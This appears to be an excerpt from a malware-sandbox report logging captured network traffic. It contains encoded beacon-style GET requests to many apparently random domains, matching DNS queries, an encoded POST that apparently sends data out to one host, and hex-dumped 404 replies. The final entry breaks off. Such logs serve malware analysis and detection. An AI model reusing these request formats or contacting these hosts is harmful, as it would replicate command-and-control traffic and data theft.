            Source: global trafficHTTP traffic detected: GET /8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= HTTP/1.1Host: www.synergon.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh HTTP/1.1Host: www.alanbeanart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= HTTP/1.1Host: www.kacotae.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh HTTP/1.1Host: www.slushcafe.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh HTTP/1.1Host: www.tqfabxah.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /l2ei/?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM= HTTP/1.1Host: www.rtrpodcast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= HTTP/1.1Host: www.mqmsqkw.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh HTTP/1.1Host: www.lfghtko.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficDNS traffic detected: DNS query: www.stemfiniti.com
            Source: global trafficDNS traffic detected: DNS query: www.zhuan-tou.com
            Source: global trafficDNS traffic detected: DNS query: www.lecoinsa.net
            Source: global trafficDNS traffic detected: DNS query: www.8xbe578.app
            Source: global trafficDNS traffic detected: DNS query: www.synergon.space
            Source: global trafficDNS traffic detected: DNS query: www.alanbeanart.com
            Source: global trafficDNS traffic detected: DNS query: www.kacotae.com
            Source: global trafficDNS traffic detected: DNS query: www.slushcafe.top
            Source: global trafficDNS traffic detected: DNS query: www.a9jcpf.top
            Source: global trafficDNS traffic detected: DNS query: www.tqfabxah.com
            Source: global trafficDNS traffic detected: DNS query: www.rtrpodcast.online
            Source: global trafficDNS traffic detected: DNS query: www.winkthree.com
            Source: global trafficDNS traffic detected: DNS query: www.mqmsqkw.lol
            Source: global trafficDNS traffic detected: DNS query: www.lfghtko.lol
            Source: unknownHTTP traffic detected: POST /pjmu/ HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.zhuan-tou.comReferer: http://www.zhuan-tou.com/pjmu/Content-Length: 200Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 54 72 59 7a 4e 41 32 41 32 31 33 7a 6b 79 64 76 4b 35 73 43 77 5a 4a 65 52 53 6c 66 48 38 59 4b 59 61 48 45 4a 33 39 55 47 4c 31 6a 59 68 30 4e 32 4e 48 42 38 52 5a 77 74 68 2f 4f 73 4b 44 7a 50 4c 71 78 30 72 45 5a 68 38 4e 55 75 39 46 68 6c 66 4b 56 47 36 61 4d 35 79 38 43 67 6c 47 31 39 2f 7a 47 69 4b 6d 41 6c 52 38 57 56 67 2f 2f 42 6f 39 47 37 58 4b 56 6e 4d 59 4b 56 56 56 62 5a 2b 34 34 31 58 72 48 7a 4a 69 57 37 49 69 70 4c 7a 72 61 65 66 2b 54 6f 66 56 72 4c 5a 67 6d 65 56 58 52 43 4a 70 45 55 6f 51 31 65 5a 38 54 30 78 32 59 67 3d 3d Data Ascii: efM=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzraef+TofVrLZgmeVXRCJpEUoQ1eZ8T0x2Yg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Aug 2024 13:31:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Aug 2024 13:31:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Aug 2024 13:31:40 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Aug 2024 13:31:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Mon, 05 Aug 2024 13:32:16 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Mon, 05 Aug 2024 13:32:19 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z 